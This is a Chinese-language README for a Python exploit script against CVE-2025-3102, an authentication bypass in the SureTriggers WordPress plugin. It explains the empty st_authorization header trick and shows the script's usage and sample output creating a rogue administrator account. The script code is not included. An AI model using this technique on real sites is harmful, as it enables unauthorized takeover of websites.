🚨 CVE-2025-3102 是一个严重的身份验证绕过漏洞,影响 SureTriggers: All-in-One Automation Platform WordPress 插件,该插件已活跃安装在超过 100,000 个网站上。鉴于该漏洞的性质和部署规模,此漏洞构成重大的安全风险。
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HWordPress 的 SureTriggers 插件存在身份验证绕过漏洞,允许未认证的攻击者创建管理员账户。这是由于 autheticate_user 函数中的 secret_key 缺少空值检查所致。
当插件已安装并激活,但未配置 API 密钥时,攻击者可以通过发送空的 st_authorization 请求头绕过身份验证,触发仅为已认证用户保留的操作。
提供了一个 Python 脚本,用于自动化利用此漏洞。
该脚本允许你在存在漏洞的站点上生成新的管理员用户。
readme.txt 自动检测插件版本st_authorization 请求头绕过身份验证usage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: rHz0d
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
此脚本仅供教育目的使用。
未经明确许可对目标使用此代码是违法的。
作者对任何滥用或造成的损害不承担任何责任。
作者: rHz0d